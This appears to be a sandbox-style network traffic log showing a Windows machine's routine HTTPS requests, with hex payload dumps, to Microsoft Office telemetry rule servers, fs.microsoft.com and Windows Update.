2024-12-07 11:59:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.7	49726	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:23 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 22943564-b01e-0021-0b03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115923Z-r1cf579d778bb9vvhC1EWRs95400000001z0000000000kdx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:24 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.7	49725	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:23 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:23 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 682fb484-401e-0083-5904-48075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115923Z-r1cf579d778mvsklhC1EWRkavg00000002g0000000003apw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:24 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.7	49733	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:25 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:25 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 3bfd724e-501e-0016-6705-48181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115925Z-r1cf579d7786c2tshC1EWRr1gc000000020g000000000kk7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:25 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.7	49732	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:25 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:25 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: aae5b6c6-f01e-005d-7a06-4813ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115925Z-r1cf579d778zvkpnhC1EWRv23g00000002e00000000041ck x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:25 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.7	49734	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:25 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:25 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 1f14184f-601e-0050-3802-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115925Z-r1cf579d7786c2tshC1EWRr1gc00000001x0000000002nwd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:26 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.7	49736	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:25 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:26 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: fff301c7-601e-0097-4606-48f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115926Z-r1cf579d77898tqwhC1EWRf9q800000002e0000000000f65 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:26 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.7	49737	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:25 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:26 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: ad3e0835-e01e-0033-5701-484695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115926Z-r1cf579d778xr2r4hC1EWRqvfs0000000270000000003ve4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:26 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49739	23.32.185.164	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:26 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-12-07 11:59:26 UTC	478	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=75612 Date: Sat, 07 Dec 2024 11:59:26 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.7	49745	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:27 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:27 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 229463e4-b01e-0021-2a03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115927Z-r1cf579d778t5c2lhC1EWRce3w00000002yg000000002qkg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:28 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.7	49744	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:27 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: c060231a-801e-00ac-2403-48fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115927Z-r1cf579d7786c2tshC1EWRr1gc00000001wg000000003ux5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.7	49746	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:27 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: f6d2a488-401e-000a-7403-484a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115928Z-r1cf579d778w59f9hC1EWRze6w00000002f0000000003gk5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49738	52.149.20.212	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:27 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PpmzE7nWNbHrURx&MD=ocWWztpu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-07 11:59:28 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 47aa55de-7a00-4d45-824b-68238f718ddd MS-RequestId: 982aa065-2042-49e2-8978-643712d9cbed MS-CV: SuFKNOoZLkeLoQA0.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 07 Dec 2024 11:59:27 GMT Connection: close Content-Length: 24490
2024-12-07 11:59:28 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 